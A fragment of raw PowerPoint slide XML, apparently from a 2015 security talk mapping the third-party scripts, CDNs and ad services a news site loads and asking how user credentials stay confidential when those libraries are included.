            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> partial overview (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>AUGust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2015)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bildobjekt 2" descr="svdlogo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138" y="3453966"/>
            <a:ext cx="1166190" cy="555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ktangel 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5918609" y="2056209"/>
            <a:ext cx="2736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http://aka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cdn.adtech.de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6" name="Rektangel 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789713" y="2411411"/>
            <a:ext cx="2486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assets.adobedtm.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rektangel 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2190625" y="5794045"/>
            <a:ext cx="40335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http://d3k1yiza4eej55</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cloudfront.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rektangel 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6801216" y="2982341"/>
            <a:ext cx="19393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smtClean="0"/>
              <a:t>http://l.lp4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>io</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Bildobjekt 8" descr="ur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052" y="4801678"/>
            <a:ext cx="1379548" cy="845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ruta 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2043691" y="4477468"/>
            <a:ext cx="68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CDN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Bildobjekt 10" descr="imgr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625" y="2854230"/>
            <a:ext cx="652201" cy="4891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Bildobjekt 12" descr="url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18" y="1737594"/>
            <a:ext cx="1055448" cy="578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Bildobjekt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8662" y="3011011"/>
            <a:ext cx="1381856" cy="3070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textruta 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941182" y="4057336"/>
            <a:ext cx="2378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Relic – analytics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Bildobjekt 16" descr="Modernizr-2-Logo1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75" y="5953311"/>
            <a:ext cx="2053181" cy="628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9" name="Rak pil 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2959101" y="3139151"/>
            <a:ext cx="616938" cy="25898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Rak pil 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4843828" y="3164551"/>
            <a:ext cx="337772" cy="29804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Rak pil 23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2997201" y="4096599"/>
            <a:ext cx="616938" cy="6121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Rak pil 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4275755" y="2497834"/>
            <a:ext cx="394178" cy="85383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Rak pil 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1670672" y="2036648"/>
            <a:ext cx="519953" cy="4482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Rak pil 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="931548" y="5540784"/>
            <a:ext cx="1038464" cy="476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ruta 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5947958" y="3697629"/>
            <a:ext cx="2827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Xaxis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – ads for publishers </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="textruta 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499889" y="5085442"/>
            <a:ext cx="1904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eu.npario-inc.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Bildobjekt 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30711" y="4802414"/>
            <a:ext cx="1108572" cy="349200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37" name="Rak pil 36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4390066" y="4109299"/>
            <a:ext cx="0" cy="5969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Rak pil 39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4891352" y="3931233"/>
            <a:ext cx="905765" cy="1653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Rundad rektangulär 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6224174" y="5540784"/>
            <a:ext cx="2050831" cy="952441"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -37151"/>
              <a:gd name="adj2" fmla="val -70834"/>
              <a:gd name="adj3" fmla="val 1666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Seems to not exist anymore?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Rundad rektangulär 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7047435" y="2497833"/>
            <a:ext cx="1233412" cy="383677"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45500"/>
              <a:gd name="adj2" fmla="val 74531"/>
              <a:gd name="adj3" fmla="val 1666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http!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Rundad rektangulär 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2690058" y="6253440"/>
            <a:ext cx="1233412" cy="383677"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -35761"/>
              <a:gd name="adj2" fmla="val -80865"/>
              <a:gd name="adj3" fmla="val 1666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http!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rundad rektangulär 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6783369" y="4708699"/>
            <a:ext cx="1727922" cy="487525"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 13466"/>
              <a:gd name="adj2" fmla="val -88727"/>
              <a:gd name="adj3" fmla="val 1666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Served in-house</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Rundad rektangulär 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660400" y="2854230"/>
            <a:ext cx="1405026" cy="1457392"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -21953"/>
              <a:gd name="adj2" fmla="val -77073"/>
              <a:gd name="adj3" fmla="val 1666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included by 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> party</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Transitive trust!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rundad rektangulär 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6197104" y="1651593"/>
            <a:ext cx="1233412" cy="383677"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45500"/>
              <a:gd name="adj2" fmla="val 74531"/>
              <a:gd name="adj3" fmla="val 1666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http!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361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can we ensure that user information given to the applications is safe?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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security focus: confidentiality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98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ktangel med rundade hörn 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7886072" y="2805968"/>
            <a:ext cx="1010050" cy="143689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latshållare för innehåll 38"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460031" y="1718468"/>
            <a:ext cx="4038600" cy="49466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What happens when a user enters sensitive data into a web application?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Consider when the user logs in into a system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How can we guarantee that the credentials are only sent back to the 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> party and are not stolen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… by one of the included 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> party libraries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… by one of the included 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> party services?</a:t>
            </a:r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Confidentiality of user data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bildobjekt 2" descr="imgres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155" y="3012644"/>
            <a:ext cx="800354" cy="80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Bildobjekt 15" descr="imgr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785" y="3910740"/>
            <a:ext cx="741793" cy="741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Bildobjekt 4" descr="j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2" y="3578616"/>
            <a:ext cx="664247" cy="664247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Bildobjekt 11" descr="1366511188978779390free-red-cloud-advertising-m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32" y="5382794"/>
            <a:ext cx="676048" cy="676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Bildobjekt 12" descr="analytics-icon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709" y="5382794"/>
            <a:ext cx="672527" cy="672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4" name="Rak pil 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6074149" y="4703260"/>
            <a:ext cx="350636" cy="67953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Rak pil 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6664973" y="4777087"/>
            <a:ext cx="0" cy="49661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Frihandsfigur 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7064366" y="3405982"/>
            <a:ext cx="903613" cy="472194"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 903613 w 903613"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 472194"/>
              <a:gd name="connsiteX1" fmla="*/ 276782 w 903613"/>
              <a:gd name="connsiteY1" fmla="*/ 162826 h 472194"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 903613"/>
              <a:gd name="connsiteY2" fmla="*/ 472194 h 47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3613" h="472194">
                <a:moveTo>
                  <a:pt x="903613" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="665498" y="42063"/>
                  <a:pt x="427384" y="84127"/>
                  <a:pt x="276782" y="162826"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126180" y="241525"/>
                  <a:pt x="0" y="472194"/>
                  <a:pt x="0" y="472194"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Rak pil 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5305482" y="3147902"/>
            <a:ext cx="1133312" cy="97858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2" name="Bildobjekt 21" descr="imgres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978" y="2451356"/>
            <a:ext cx="800354" cy="80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Bildobjekt 17" descr="jQurery.gi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90" y="2549962"/>
            <a:ext cx="462682" cy="462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Bildobjekt 18" descr="modernizr-sticker.jpg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3667" r="963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36" t="18638" r="4562" b="17732"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096380" y="2549962"/>
            <a:ext cx="664624" cy="462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textruta 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4620717" y="2169906"/>
            <a:ext cx="68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CDN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="textruta 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7886072" y="3812998"/>
            <a:ext cx="101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party</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="textruta 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6799630" y="268021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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="textruta 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7159779" y="546224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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Frihandsfigur 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5506290" y="3660801"/>
            <a:ext cx="2491043" cy="747238"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2491043"/>
              <a:gd name="connsiteY0" fmla="*/ 700149 h 747238"/>
              <a:gd name="connsiteX1" fmla="*/ 1188537 w 2491043"/>
              <a:gd name="connsiteY1" fmla="*/ 708290 h 747238"/>
              <a:gd name="connsiteX2" fmla="*/ 1994463 w 2491043"/>
              <a:gd name="connsiteY2" fmla="*/ 276803 h 747238"/>
              <a:gd name="connsiteX3" fmla="*/ 2491043 w 2491043"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 74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1043" h="747238">
                <a:moveTo>
                  <a:pt x="0" y="700149"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="428063" y="739498"/>
                  <a:pt x="856126" y="778848"/>
                  <a:pt x="1188537" y="708290"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1520948" y="637732"/>
                  <a:pt x="1777379" y="394851"/>
                  <a:pt x="1994463" y="276803"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2211547" y="158755"/>
                  <a:pt x="2491043" y="0"/>
                  <a:pt x="2491043" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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ihandsfigur 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5514431" y="4296679"/>
            <a:ext cx="1092640" cy="1423863"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1092640"/>
              <a:gd name="connsiteY0" fmla="*/ 56130 h 1423863"/>
              <a:gd name="connsiteX1" fmla="*/ 1090849 w 1092640"/>
              <a:gd name="connsiteY1" fmla="*/ 161966 h 1423863"/>
              <a:gd name="connsiteX2" fmla="*/ 276782 w 1092640"/>
              <a:gd name="connsiteY2" fmla="*/ 1423863 h 1423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2640" h="1423863">
                <a:moveTo>
                  <a:pt x="0" y="56130"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="522359" y="-4930"/>
                  <a:pt x="1044719" y="-65989"/>
                  <a:pt x="1090849" y="161966"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1136979" y="389921"/>
                  <a:pt x="276782" y="1423863"/>
                  <a:pt x="276782" y="1423863"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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ihandsfigur 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5522572" y="4263525"/>
            <a:ext cx="1277367" cy="1457017"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1277367"/>
              <a:gd name="connsiteY0" fmla="*/ 89284 h 1457017"/>
              <a:gd name="connsiteX1" fmla="*/ 1172255 w 1277367"/>
              <a:gd name="connsiteY1" fmla="*/ 146273 h 1457017"/>
              <a:gd name="connsiteX2" fmla="*/ 1147833 w 1277367"/>
              <a:gd name="connsiteY2" fmla="*/ 1457017 h 1457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7367" h="1457017">
                <a:moveTo>
                  <a:pt x="0" y="89284"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="490475" y="3800"/>
                  <a:pt x="980950" y="-81683"/>
                  <a:pt x="1172255" y="146273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1363561" y="374229"/>
                  <a:pt x="1255697" y="915623"/>
                  <a:pt x="1147833" y="1457017"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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ihandsfigur 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5514431" y="2162808"/>
            <a:ext cx="1139332" cy="2413336"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1139332"/>
              <a:gd name="connsiteY0" fmla="*/ 2190001 h 2413336"/>
              <a:gd name="connsiteX1" fmla="*/ 1131552 w 1139332"/>
              <a:gd name="connsiteY1" fmla="*/ 2206283 h 2413336"/>
              <a:gd name="connsiteX2" fmla="*/ 529143 w 1139332"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 241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9332" h="2413336">
                <a:moveTo>
                  <a:pt x="0" y="2190001"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="521681" y="2380642"/>
                  <a:pt x="1043362" y="2571283"/>
                  <a:pt x="1131552" y="2206283"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1219742" y="1841283"/>
                  <a:pt x="529143" y="0"/>
                  <a:pt x="529143" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln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Bildobjekt 33" descr="imgres.jpg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209" y="4703260"/>
            <a:ext cx="502123" cy="50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1" name="Rak 40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498631" y="1808610"/>
            <a:ext cx="0" cy="46279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Bildobjekt 28" descr="search.png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209" y="4112988"/>
            <a:ext cx="504000" cy="50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1440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ktangel med rundade hörn 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7886072" y="2805968"/>
            <a:ext cx="1010050" cy="143689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Confidentiality of user data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bildobjekt 2" descr="imgres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155" y="3012644"/>
            <a:ext cx="800354" cy="80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Bildobjekt 15" descr="imgr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785" y="3910740"/>
            <a:ext cx="741793" cy="741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Bildobjekt 4" descr="j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2" y="3578616"/>
            <a:ext cx="664247" cy="664247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Bildobjekt 11" descr="1366511188978779390free-red-cloud-advertising-m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32" y="5382794"/>
            <a:ext cx="676048" cy="676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Bildobjekt 12" descr="analytics-icon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709" y="5382794"/>
            <a:ext cx="672527" cy="672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4" name="Rak pil 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6074149" y="4703260"/>
            <a:ext cx="350636" cy="67953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Rak pil 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6664973" y="4777087"/>
            <a:ext cx="0" cy="49661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Frihandsfigur 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7064366" y="3405982"/>
            <a:ext cx="903613" cy="472194"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 903613 w 903613"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 472194"/>
              <a:gd name="connsiteX1" fmla="*/ 276782 w 903613"/>
              <a:gd name="connsiteY1" fmla="*/ 162826 h 472194"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 903613"/>
              <a:gd name="connsiteY2" fmla="*/ 472194 h 47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3613" h="472194">
                <a:moveTo>
                  <a:pt x="903613" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="665498" y="42063"/>
                  <a:pt x="427384" y="84127"/>
                  <a:pt x="276782" y="162826"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126180" y="241525"/>
                  <a:pt x="0" y="472194"/>
                  <a:pt x="0" y="472194"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Rak pil 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5305482" y="3147902"/>
            <a:ext cx="1133312" cy="97858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2" name="Bildobjekt 21" descr="imgres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978" y="2451356"/>
            <a:ext cx="800354" cy="80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Bildobjekt 17" descr="jQurery.gi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90" y="2549962"/>
            <a:ext cx="462682" cy="462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Bildobjekt 18" descr="modernizr-sticker.jpg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3667" r="963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36" t="18638" r="4562" b="17732"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096380" y="2549962"/>
            <a:ext cx="664624" cy="462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textruta 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4620717" y="2169906"/>
            <a:ext cx="68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CDN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="textruta 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7886072" y="3812998"/>
            <a:ext cx="101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party</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="textruta 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6799630" y="268021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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="textruta 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7159779" y="546224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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Frihandsfigur 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5506290" y="3660801"/>
            <a:ext cx="2491043" cy="747238"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2491043"/>
              <a:gd name="connsiteY0" fmla="*/ 700149 h 747238"/>
              <a:gd name="connsiteX1" fmla="*/ 1188537 w 2491043"/>
              <a:gd name="connsiteY1" fmla="*/ 708290 h 747238"/>
              <a:gd name="connsiteX2" fmla="*/ 1994463 w 2491043"/>
              <a:gd name="connsiteY2" fmla="*/ 276803 h 747238"/>
              <a:gd name="connsiteX3" fmla="*/ 2491043 w 2491043"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 74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1043" h="747238">
                <a:moveTo>
                  <a:pt x="0" y="700149"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="428063" y="739498"/>
                  <a:pt x="856126" y="778848"/>
                  <a:pt x="1188537" y="708290"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1520948" y="637732"/>
                  <a:pt x="1777379" y="394851"/>
                  <a:pt x="1994463" y="276803"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2211547" y="158755"/>
